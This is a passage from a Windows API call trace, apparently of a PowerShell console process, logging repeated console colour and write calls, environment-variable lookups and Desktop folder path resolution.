| out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.092] GetConsoleOutputCP () returned 0x1b5 [0163.092] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.093] GetConsoleOutputCP () returned 0x1b5 [0163.093] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.093] GetConsoleOutputCP () returned 0x1b5 [0163.093] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.093] GetConsoleOutputCP () returned 0x1b5 [0163.093] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.093] GetConsoleOutputCP () returned 0x1b5 [0163.093] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.094] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e49c | out: lpConsoleScreenBufferInfo=0x5a0e49c) returned 1 [0163.095] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e434 | out: lpConsoleScreenBufferInfo=0x5a0e434) returned 1 [0163.095] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e434 | out: lpConsoleScreenBufferInfo=0x5a0e434) returned 1 [0163.095] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e43c | out: lpConsoleScreenBufferInfo=0x5a0e43c) returned 1 [0163.096] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0163.096] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e43c | out: lpConsoleScreenBufferInfo=0x5a0e43c) returned 1 [0163.097] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0163.098] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5a0da98, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0163.098] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e458 | out: lpMode=0x5a0e458) returned 1 [0163.099] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x2761cb4*, nNumberOfCharsToWrite=0x4d, lpNumberOfCharsWritten=0x5a0e44c, lpReserved=0x0 | out: lpBuffer=0x2761cb4*, lpNumberOfCharsWritten=0x5a0e44c*=0x4d) returned 1 [0163.101] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e438 | out: lpConsoleScreenBufferInfo=0x5a0e438) returned 1 [0163.101] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0163.102] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e438 | out: lpConsoleScreenBufferInfo=0x5a0e438) returned 1 [0163.102] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0163.102] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e498 | out: lpMode=0x5a0e498) returned 1 [0163.103] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x22e1700*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5a0e48c, lpReserved=0x0 | out: lpBuffer=0x22e1700*, lpNumberOfCharsWritten=0x5a0e48c*=0x1) returned 1 [0163.103] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e49c | out: lpConsoleScreenBufferInfo=0x5a0e49c) returned 1 [0163.103] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e434 | out: lpConsoleScreenBufferInfo=0x5a0e434) returned 1 [0163.104] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e434 | out: lpConsoleScreenBufferInfo=0x5a0e434) returned 1 [0163.104] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e43c | out: lpConsoleScreenBufferInfo=0x5a0e43c) returned 1 [0163.104] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0163.105] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e43c | out: lpConsoleScreenBufferInfo=0x5a0e43c) returned 1 [0163.105] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0163.105] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e458 | out: lpMode=0x5a0e458) returned 1 [0163.106] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x2762348*, nNumberOfCharsToWrite=0x4c, lpNumberOfCharsWritten=0x5a0e44c, lpReserved=0x0 | out: lpBuffer=0x2762348*, lpNumberOfCharsWritten=0x5a0e44c*=0x4c) returned 1 [0163.106] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e438 | out: lpConsoleScreenBufferInfo=0x5a0e438) returned 1 [0163.106] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0163.107] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e438 | out: lpConsoleScreenBufferInfo=0x5a0e438) returned 1 [0163.107] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0163.107] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e498 | out: lpMode=0x5a0e498) returned 1 [0163.108] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x22e1700*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5a0e48c, lpReserved=0x0 | out: lpBuffer=0x22e1700*, lpNumberOfCharsWritten=0x5a0e48c*=0x1) returned 1 [0163.108] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e49c | out: lpConsoleScreenBufferInfo=0x5a0e49c) returned 1 [0163.108] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e434 | out: lpConsoleScreenBufferInfo=0x5a0e434) returned 1 [0163.109] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e434 | out: lpConsoleScreenBufferInfo=0x5a0e434) returned 1 [0163.109] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e43c | out: lpConsoleScreenBufferInfo=0x5a0e43c) returned 1 [0163.109] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0163.109] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e43c | out: lpConsoleScreenBufferInfo=0x5a0e43c) returned 1 [0163.110] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0163.110] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e458 | out: lpMode=0x5a0e458) returned 1 [0163.110] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x276269c*, nNumberOfCharsToWrite=0x38, lpNumberOfCharsWritten=0x5a0e44c, lpReserved=0x0 | out: lpBuffer=0x276269c*, lpNumberOfCharsWritten=0x5a0e44c*=0x38) returned 1 [0163.111] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e438 | out: lpConsoleScreenBufferInfo=0x5a0e438) returned 1 [0163.111] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0163.111] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e438 | out: lpConsoleScreenBufferInfo=0x5a0e438) returned 1 [0163.112] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0163.112] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e498 | out: lpMode=0x5a0e498) returned 1 [0163.112] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x22e1700*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5a0e48c, lpReserved=0x0 | out: lpBuffer=0x22e1700*, lpNumberOfCharsWritten=0x5a0e48c*=0x1) returned 1 [0163.113] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e49c | out: lpConsoleScreenBufferInfo=0x5a0e49c) returned 1 [0163.113] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e434 | out: lpConsoleScreenBufferInfo=0x5a0e434) returned 1 [0163.113] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e434 | out: lpConsoleScreenBufferInfo=0x5a0e434) returned 1 [0163.114] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e43c | out: lpConsoleScreenBufferInfo=0x5a0e43c) returned 1 [0163.114] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0163.114] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e43c | out: lpConsoleScreenBufferInfo=0x5a0e43c) returned 1 [0163.115] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0163.115] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e458 | out: lpMode=0x5a0e458) returned 1 [0163.115] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x27613b8*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x5a0e44c, lpReserved=0x0 | out: lpBuffer=0x27613b8*, lpNumberOfCharsWritten=0x5a0e44c*=0x10) returned 1 [0163.116] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e438 | out: lpConsoleScreenBufferInfo=0x5a0e438) returned 1 [0163.116] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0163.116] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e438 | out: lpConsoleScreenBufferInfo=0x5a0e438) returned 1 [0163.117] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0163.117] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e498 | out: lpMode=0x5a0e498) returned 1 [0163.117] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x22e1700*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5a0e48c, lpReserved=0x0 | out: lpBuffer=0x22e1700*, lpNumberOfCharsWritten=0x5a0e48c*=0x1) returned 1 [0163.118] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e49c | out: lpConsoleScreenBufferInfo=0x5a0e49c) returned 1 [0163.118] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e434 | out: lpConsoleScreenBufferInfo=0x5a0e434) returned 1 [0163.118] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e434 | out: lpConsoleScreenBufferInfo=0x5a0e434) returned 1 [0163.119] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e43c | out: lpConsoleScreenBufferInfo=0x5a0e43c) returned 1 [0163.119] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0163.119] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e43c | out: lpConsoleScreenBufferInfo=0x5a0e43c) returned 1 [0163.120] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0163.120] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e458 | out: lpMode=0x5a0e458) returned 1 [0163.120] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x27613e8*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x5a0e44c, lpReserved=0x0 | out: lpBuffer=0x27613e8*, lpNumberOfCharsWritten=0x5a0e44c*=0x3) returned 1 [0163.121] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e438 | out: lpConsoleScreenBufferInfo=0x5a0e438) returned 1 [0163.121] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0163.121] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e438 | out: lpConsoleScreenBufferInfo=0x5a0e438) returned 1 [0163.122] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0163.122] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e498 | out: lpMode=0x5a0e498) returned 1 [0163.122] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x22e1700*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5a0e48c, lpReserved=0x0 | out: lpBuffer=0x22e1700*, lpNumberOfCharsWritten=0x5a0e48c*=0x1) returned 1 [0163.123] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e49c | out: lpConsoleScreenBufferInfo=0x5a0e49c) returned 1 [0163.123] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e434 | out: lpConsoleScreenBufferInfo=0x5a0e434) returned 1 [0163.123] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e434 | out: lpConsoleScreenBufferInfo=0x5a0e434) returned 1 [0163.123] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e43c | out: lpConsoleScreenBufferInfo=0x5a0e43c) returned 1 [0163.124] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0163.124] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e43c | out: lpConsoleScreenBufferInfo=0x5a0e43c) returned 1 [0163.124] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0163.125] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e458 | out: lpMode=0x5a0e458) returned 1 [0163.125] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x27613fc*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x5a0e44c, lpReserved=0x0 | out: lpBuffer=0x27613fc*, lpNumberOfCharsWritten=0x5a0e44c*=0x3) returned 1 [0163.125] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e438 | out: lpConsoleScreenBufferInfo=0x5a0e438) returned 1 [0163.126] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0163.126] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e438 | out: lpConsoleScreenBufferInfo=0x5a0e438) returned 1 [0163.126] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0163.127] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e498 | out: lpMode=0x5a0e498) returned 1 [0163.127] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x22e1700*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5a0e48c, lpReserved=0x0 | out: lpBuffer=0x22e1700*, lpNumberOfCharsWritten=0x5a0e48c*=0x1) returned 1 [0163.127] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e49c | out: lpConsoleScreenBufferInfo=0x5a0e49c) returned 1 [0163.128] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e434 | out: lpConsoleScreenBufferInfo=0x5a0e434) returned 1 [0163.128] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e434 | out: lpConsoleScreenBufferInfo=0x5a0e434) returned 1 [0163.128] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e43c | out: lpConsoleScreenBufferInfo=0x5a0e43c) returned 1 [0163.129] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0163.129] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e43c | out: lpConsoleScreenBufferInfo=0x5a0e43c) returned 1 [0163.129] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0163.129] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e458 | out: lpMode=0x5a0e458) returned 1 [0163.130] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x2762e64*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x5a0e44c, lpReserved=0x0 | out: lpBuffer=0x2762e64*, lpNumberOfCharsWritten=0x5a0e44c*=0x4f) returned 1 [0163.130] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e438 | out: lpConsoleScreenBufferInfo=0x5a0e438) returned 1 [0163.131] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0163.131] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e438 | out: lpConsoleScreenBufferInfo=0x5a0e438) returned 1 [0163.131] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0163.132] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e498 | out: lpMode=0x5a0e498) returned 1 [0163.132] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x22e1700*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5a0e48c, lpReserved=0x0 | out: lpBuffer=0x22e1700*, lpNumberOfCharsWritten=0x5a0e48c*=0x1) returned 1 [0163.132] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e49c | out: lpConsoleScreenBufferInfo=0x5a0e49c) returned 1 [0163.133] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e434 | out: lpConsoleScreenBufferInfo=0x5a0e434) returned 1 [0163.133] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e434 | out: lpConsoleScreenBufferInfo=0x5a0e434) returned 1 [0163.133] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e43c | out: lpConsoleScreenBufferInfo=0x5a0e43c) returned 1 [0163.133] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0163.134] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e43c | out: lpConsoleScreenBufferInfo=0x5a0e43c) returned 1 [0163.134] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0163.134] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e458 | out: lpMode=0x5a0e458) returned 1 [0163.135] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x2763088*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x5a0e44c, lpReserved=0x0 | out: lpBuffer=0x2763088*, lpNumberOfCharsWritten=0x5a0e44c*=0xa) returned 1 [0163.135] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e438 | out: lpConsoleScreenBufferInfo=0x5a0e438) returned 1 [0163.135] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0163.136] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e438 | out: lpConsoleScreenBufferInfo=0x5a0e438) returned 1 [0163.136] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0163.136] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e498 | out: lpMode=0x5a0e498) returned 1 [0163.137] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x22e1700*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5a0e48c, lpReserved=0x0 | out: lpBuffer=0x22e1700*, lpNumberOfCharsWritten=0x5a0e48c*=0x1) returned 1 [0163.137] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e49c | out: lpConsoleScreenBufferInfo=0x5a0e49c) returned 1 [0163.137] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e434 | out: lpConsoleScreenBufferInfo=0x5a0e434) returned 1 [0163.138] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e434 | out: lpConsoleScreenBufferInfo=0x5a0e434) returned 1 [0163.138] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e43c | out: lpConsoleScreenBufferInfo=0x5a0e43c) returned 1 [0163.138] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0163.139] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e43c | out: lpConsoleScreenBufferInfo=0x5a0e43c) returned 1 [0163.139] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0163.139] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e458 | out: lpMode=0x5a0e458) returned 1 [0163.140] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x27614d0*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0x5a0e44c, lpReserved=0x0 | out: lpBuffer=0x27614d0*, lpNumberOfCharsWritten=0x5a0e44c*=0x36) returned 1 [0163.140] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e438 | out: lpConsoleScreenBufferInfo=0x5a0e438) returned 1 [0163.140] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0163.141] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e438 | out: lpConsoleScreenBufferInfo=0x5a0e438) returned 1 [0163.141] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0163.141] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e498 | out: lpMode=0x5a0e498) returned 1 [0163.142] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x22e1700*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5a0e48c, lpReserved=0x0 | out: lpBuffer=0x22e1700*, lpNumberOfCharsWritten=0x5a0e48c*=0x1) returned 1 [0163.142] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e49c | out: lpConsoleScreenBufferInfo=0x5a0e49c) returned 1 [0163.142] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e434 | out: lpConsoleScreenBufferInfo=0x5a0e434) returned 1 [0163.142] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e434 | out: lpConsoleScreenBufferInfo=0x5a0e434) returned 1 [0163.143] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e43c | out: lpConsoleScreenBufferInfo=0x5a0e43c) returned 1 [0163.143] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0163.143] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e43c | out: lpConsoleScreenBufferInfo=0x5a0e43c) returned 1 [0163.144] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0163.144] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e458 | out: lpMode=0x5a0e458) returned 1 [0163.144] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x276154c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5a0e44c, lpReserved=0x0 | out: lpBuffer=0x276154c*, lpNumberOfCharsWritten=0x5a0e44c*=0x1) returned 1 [0163.145] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e438 | out: lpConsoleScreenBufferInfo=0x5a0e438) returned 1 [0163.145] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0163.145] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e438 | out: lpConsoleScreenBufferInfo=0x5a0e438) returned 1 [0163.146] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0163.146] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e498 | out: lpMode=0x5a0e498) returned 1 [0163.146] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x22e1700*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5a0e48c, lpReserved=0x0 | out: lpBuffer=0x22e1700*, lpNumberOfCharsWritten=0x5a0e48c*=0x1) returned 1 [0163.208] GetEnvironmentVariableW (in: lpName="LOCALAPPDATA", lpBuffer=0x5a0e3e0, nSize=0xd7 | out: lpBuffer="") returned 0x20 [0163.513] GetEnvironmentVariableW (in: lpName="LOCALAPPDATA", lpBuffer=0x5a0e670, nSize=0xd7 | out: lpBuffer="") returned 0x20 [0163.709] CoTaskMemAlloc (cb=0x20c) returned 0x656f48 [0163.709] SHGetFolderPathW (in: hwnd=0x0, csidl=25, hToken=0x0, dwFlags=0x0, pszPath=0x656f48 | out: pszPath="C:\\Users\\Public\\Desktop") returned 0x0 [0163.711] CoTaskMemFree (pv=0x656f48) [0163.711] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Desktop", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x18 [0163.711] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Desktop", nBufferLength=0x18, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Desktop", lpFilePart=0x0) returned 0x17 [0163.711] CoTaskMemAlloc (cb=0x20c) returned 0x656f48 [0163.711] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x656f48 | out: pszPath="C:\\Users\\kEecfMwgj\\Desktop") returned 0x0 [0163.713] CoTaskMemFree (pv=0x656f48) [0163.713] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1b [0163.713] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x1b, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop", lpFilePart=0x0) returned 0x1a [0163.716] GetEnvironmentVariableW (in: lpName="LOCALAPPDATA", lpBuffer=0x5a0e3e0, nSize=0xd7 | out: lpBuffer="") returned 0x20 [0163.716] GetEnvironmentVariableW (in: lpName="LOCALAPPDATA", lpBuffer=0x5a0e670, nSize=0xd7 | out: lpBuffer="") returned 0x20 [0163.717] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e490, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0163.748] EtwEventActivityIdControl () returned 0x0 [0163.748] EtwEventActivityIdControl () returned 0x0 [0163.748] EtwEventActivityIdControl () returned 0x0 [0163.779] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default")) returned 0xffffffff [0163.780] EtwEventActivityIdControl () returned 0x0 [0163.804] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e490, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0163.898] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e490, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0163.904] EtwEventActivityIdControl () returned 0x0 [0163.904] EtwEventActivityIdControl () returned 0x0 [0163.904] EtwEventActivityIdControl () returned 0x0 [0164.036] 